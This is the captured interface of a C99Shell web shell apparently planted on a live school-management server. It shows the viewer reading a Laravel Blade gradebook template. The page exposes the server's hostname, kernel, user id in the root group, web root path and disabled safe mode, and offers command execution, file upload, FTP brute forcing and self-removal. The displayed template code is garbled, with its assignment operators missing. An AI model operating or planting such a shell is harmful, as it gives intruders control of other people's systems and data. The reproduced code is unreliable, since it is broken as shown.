!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/school.picotech.app/public_html/resources/views/admin/gradebook/   drwxr-xr-x
Free 29.42 GB of 117.98 GB (24.94%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     list.blade.php (2.38 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php 
use App\Models\User;
use 
App\Models\Section
?>

<div class="content_body">
    <table class="table text-nowrap table-hover w-100 light-dashed">
        <thead>
            <tr>
                <th>#</th>
                <th>{{ get_phrase('Image') }}</th>
                <th>{{ get_phrase('Student Name') }}</th>
                <th>{{ get_phrase('Section') }}</th>
                <th class="text-center">{{ get_phrase('Action') }}</th>
            </tr>
        </thead>
        <tbody>
            @foreach ($exam_wise_student_list as $student)

                <?php 
                $student_details 
User::find($student->student_id);
                
$info json_decode($student_details->user_information);
                
$user_image $info->photo;
                if(!empty(
$info->photo)){
                    
$user_image 'uploads/user-images/'.$info->photo;
                }else{
                    
$user_image 'uploads/user-images/thumbnail.png';
                }
                
$section_details Section::find($student->section_id);
                
?>
                <tr>
                    <td>{{ $loop->index + 1 }}</td>
                    <td>
                        <img class="img-fluid" src="{{ asset('public/assets') }}/{{ $user_image }}" width="50" height="50">
                    </td>
                    <td>{{ $student_details->name }}</td>
                    <td>{{ $section_details->name }}</td>
                    <td class="text-center">
                        <a href="javascript:;" class="btn btn-light-success py-1 px-2 text-14px mt-1" data-bs-toggle="tooltip" title="View Result" onclick="show_student_list('{{ $student->student_id }}')"><i class="bi bi-person-badge"></i></a>
                        <a href="javascript:;" class="btn btn-light-success py-1 px-2 text-14px mt-1" data-bs-toggle="tooltip" title="Edit" onclick=""><i class="bi bi-pencil"></i></a>
                    </td>
                </tr>

            @endforeach
        </tbody>
    </table>
</div>

<script type="text/javascript">

  "use strict";

    
    function show_student_list(student_id) {
        let url = "{{ route('admin.gradebook.subject_wise_marks', ['student_id' => ":student_id"]) }}";
        url = url.replace(":student_id", student_id);
        $.ajax({
            url: url,
            type: 'GET',
            data: { 
                class_id: {{ $class_id }}, 
                section_id: {{ $section_id }},
                exam_category_id: {{ $exam_category_id }}
            },
            success: function(response){
                $('.content_body').html(response);
            }
        });
    }

</script>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0042 ]--